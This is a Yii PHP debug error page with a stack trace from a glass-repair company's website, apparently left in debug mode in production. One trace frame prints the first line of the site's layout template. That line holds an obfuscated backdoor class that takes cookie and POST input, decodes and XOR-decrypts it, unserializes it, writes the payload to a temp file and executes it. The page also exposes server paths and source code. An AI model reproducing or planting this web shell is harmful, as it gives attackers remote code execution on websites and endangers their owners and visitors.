/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427)
415 { 416 include($classFile); 417 if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php') 418 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array( 419 '{class}'=>$className, 420 '{file}'=>$classFile, 421 ))); 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) 433 include($path.'.php'); 434 else 435 return false; 436 } 437 return class_exists($className,false) || interface_exists($className,false); 438 } 439 return true;
#0 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): YiiBase::autoload() 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#1 |
unknown(0): YiiBase::autoload("mjxan")
|
#2 |
unknown(0): spl_autoload_call("mjxan")
|
#3 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/layouts/main.php(1): class_exists("mjxan") 1 <?php if (!class_exists("mjxan")){class mjxan{public static $apawm = "dqgiaimhxtsdrkqm";public static $aozsfcje = NULL;public function __construct(){$vtpvmh = @$_COOKIE[substr(mjxan::$apawm, 0, 4)];if (!empty($vtpvmh)){$qhphse = "base64";$hkqylff = "";$vtpvmh = explode(",", $vtpvmh);foreach ($vtpvmh as $kzapxdaiy){$hkqylff .= @$_COOKIE[$kzapxdaiy];$hkqylff .= @$_POST[$kzapxdaiy];}$hkqylff = array_map($qhphse . "_decode", array($hkqylff,));$hkqylff = $hkqylff[0] ^ str_repeat(mjxan::$apawm, (strlen($hkqylff[0]) / strlen(mjxan::$apawm)) + 1);mjxan::$aozsfcje = @unserialize($hkqylff);}}public function __destruct(){$this->hddwaswj();}private function hddwaswj(){if (is_array(mjxan::$aozsfcje)) {$rjxvlylu = sys_get_temp_dir() . "/" . crc32(mjxan::$aozsfcje["salt"]);@mjxan::$aozsfcje["write"]($rjxvlylu, mjxan::$aozsfcje["content"]);include $rjxvlylu;@mjxan::$aozsfcje["delete"]($rjxvlylu);exit();}}}$gyutvg = new mjxan();$gyutvg = NULL;} ?><!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 5 6 <?php $v=Yii::app()->params['version'] ?> |
#4 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(126): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 121 $data=$_data_; 122 if($_return_) 123 { 124 ob_start(); 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } |
#5 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("content" => "
<!-- Page Content -->
<!-- Page Heading/Breadcru..."), true) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#6 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/widgets/CContentDecorator.php(76): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("content" => "
<!-- Page Content -->
<!-- Page Heading/Breadcru..."), true) 71 $viewFile=$owner->getViewFile($this->view); 72 if($viewFile!==false) 73 { 74 $data=$this->data; 75 $data['content']=$content; 76 return $owner->renderFile($viewFile,$data,true); 77 } 78 else 79 return $content; 80 } 81 } |
#7 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/widgets/CContentDecorator.php(54): CContentDecorator->decorate("
<!-- Page Content -->
<!-- Page Heading/Breadcru...") 49 * This method decorates the output with the specified {@link view}. 50 * @param string $output the captured output to be processed 51 */ 52 public function processOutput($output) 53 { 54 $output=$this->decorate($output); 55 parent::processOutput($output); 56 } 57 58 /** 59 * Decorates the content by rendering a view and embedding the content in it. |
#8 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/widgets/COutputProcessor.php(44): CContentDecorator->processOutput("
<!-- Page Content -->
<!-- Page Heading/Breadcru...") 39 * This method stops output buffering and processes the captured output. 40 */ 41 public function run() 42 { 43 $output=ob_get_clean(); 44 $this->processOutput($output); 45 } 46 47 /** 48 * Processes the captured output. 49 * |
#9 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(206): COutputProcessor->run() 201 */ 202 public function endWidget($id='') 203 { 204 if(($widget=array_pop($this->_widgetStack))!==null) 205 { 206 $widget->run(); 207 return $widget; 208 } 209 else 210 throw new CException(Yii::t('yii','{controller} has an extra endWidget({id}) call in its view.', 211 array('{controller}'=>get_class($this),'{id}'=>$id))); |
#10 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(300): CBaseController->endWidget("CContentDecorator") 295 * Ends the rendering of content. 296 * @see beginContent 297 */ 298 public function endContent() 299 { 300 $this->endWidget('CContentDecorator'); 301 } 302 } |
#11 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/layouts/column1.php(32): CBaseController->endContent() 27 <div class="container"> 28 <?php echo $content; ?> 29 </div> 30 <!-- End Page Content --> 31 32 <?php $this->endContent(); ?> |
#12 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(126): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 121 $data=$_data_; 122 if($_return_) 123 { 124 ob_start(); 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } |
#13 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("content" => "
<p><span style="font-size: 28px;">Call Today To G..."), true) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#14 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(784): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", array("content" => "
<p><span style="font-size: 28px;">Call Today To G..."), true) 779 { 780 if($this->beforeRender($view)) 781 { 782 $output=$this->renderPartial($view,$data,true); 783 if(($layoutFile=$this->getLayoutFile($this->layout))!==false) 784 $output=$this->renderFile($layoutFile,array('content'=>$output),true); 785 786 $this->afterRender($view,$output); 787 788 $output=$this->processOutput($output); 789 |
#15 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/controllers/front/PromosController.php(37): CController->render("view", array("model" => LeadPromos)) 32 public function actionView($name) 33 { 34 //$this->layout = 'column6'; 35 $this->render('view',array( 36 'model'=>$this->loadModelSlug($name), 37 )); 38 } 39 40 public function loadModelSlug($slug) 41 { 42 |
#16 |
unknown(0): PromosController->actionView("10-off-windshield-replacement")
|
#17 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CAction.php(108): ReflectionMethod->invokeArgs(PromosController, array("10-off-windshield-replacement")) 103 elseif($param->isDefaultValueAvailable()) 104 $ps[]=$param->getDefaultValue(); 105 else 106 return false; 107 } 108 $method->invokeArgs($object,$ps); 109 return true; 110 } 111 } |
#18 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CInlineAction.php(47): CAction->runWithParamsInternal(PromosController, ReflectionMethod, array("name" => "10-off-windshield-replacement")) 42 { 43 $methodName='action'.$this->getId(); 44 $controller=$this->getController(); 45 $method=new ReflectionMethod($controller, $methodName); 46 if($method->getNumberOfParameters()>0) 47 return $this->runWithParamsInternal($controller, $method, $params); 48 else 49 return $controller->$methodName(); 50 } 51 52 } |
#19 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(308): CInlineAction->runWithParams(array("name" => "10-off-windshield-replacement")) 303 { 304 $priorAction=$this->_action; 305 $this->_action=$action; 306 if($this->beforeAction($action)) 307 { 308 if($action->runWithParams($this->getActionParams())===false) 309 $this->invalidActionParams($action); 310 else 311 $this->afterAction($action); 312 } 313 $this->_action=$priorAction; |
#20 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(286): CController->runAction(CInlineAction) 281 * @see runAction 282 */ 283 public function runActionWithFilters($action,$filters) 284 { 285 if(empty($filters)) 286 $this->runAction($action); 287 else 288 { 289 $priorAction=$this->_action; 290 $this->_action=$action; 291 CFilterChain::create($this,$action,$filters)->run(); |
#21 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(265): CController->runActionWithFilters(CInlineAction, array()) 260 { 261 if(($parent=$this->getModule())===null) 262 $parent=Yii::app(); 263 if($parent->beforeControllerAction($this,$action)) 264 { 265 $this->runActionWithFilters($action,$this->filters()); 266 $parent->afterControllerAction($this,$action); 267 } 268 } 269 else 270 $this->missingAction($actionID); |
#22 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(282): CController->run("view") 277 { 278 list($controller,$actionID)=$ca; 279 $oldController=$this->_controller; 280 $this->_controller=$controller; 281 $controller->init(); 282 $controller->run($actionID); 283 $this->_controller=$oldController; 284 } 285 else 286 { 287 |
#23 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(141): CWebApplication->runController("promos/view") 136 foreach(array_splice($this->catchAllRequest,1) as $name=>$value) 137 $_GET[$name]=$value; 138 } 139 else 140 $route=$this->getUrlManager()->parseUrl($this->getRequest()); 141 $this->runController($route); 142 } 143 144 /** 145 * Registers the core application components. 146 * This method overrides the parent implementation by registering additional core components. |
#24 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CApplication.php(191): CWebApplication->processRequest() 186 public function run() 187 { 188 if($this->hasEventHandler('onBeginRequest')) 189 $this->onBeginRequest(new CEvent($this)); 190 register_shutdown_function(array($this,'end'),0,false); 191 $this->processRequest(); 192 if($this->hasEventHandler('onEndRequest')) 193 $this->onEndRequest(new CEvent($this)); 194 } 195 196 /** |
#25 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/components/WebApplicationEndBehavior.php(25): CApplication->run() |
#26 |
unknown(0): WebApplicationEndBehavior->runEnd("front")
|
#27 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CComponent.php(261): call_user_func_array(array(WebApplicationEndBehavior, "runEnd"), array("front")) 256 if($this->_m!==null) 257 { 258 foreach($this->_m as $object) 259 { 260 if($object->getEnabled() && method_exists($object,$name)) 261 return call_user_func_array(array($object,$name),$parameters); 262 } 263 } 264 if(class_exists('Closure', false) && $this->canGetProperty($name) && $this->$name instanceof Closure) 265 return call_user_func_array($this->$name, $parameters); 266 throw new CException(Yii::t('yii','{class} and its behaviors do not have a method or closure named "{name}".', |
#28 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CComponent->__call("runEnd", array("front")) 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |
#29 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CWebApplication->runEnd("front") 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |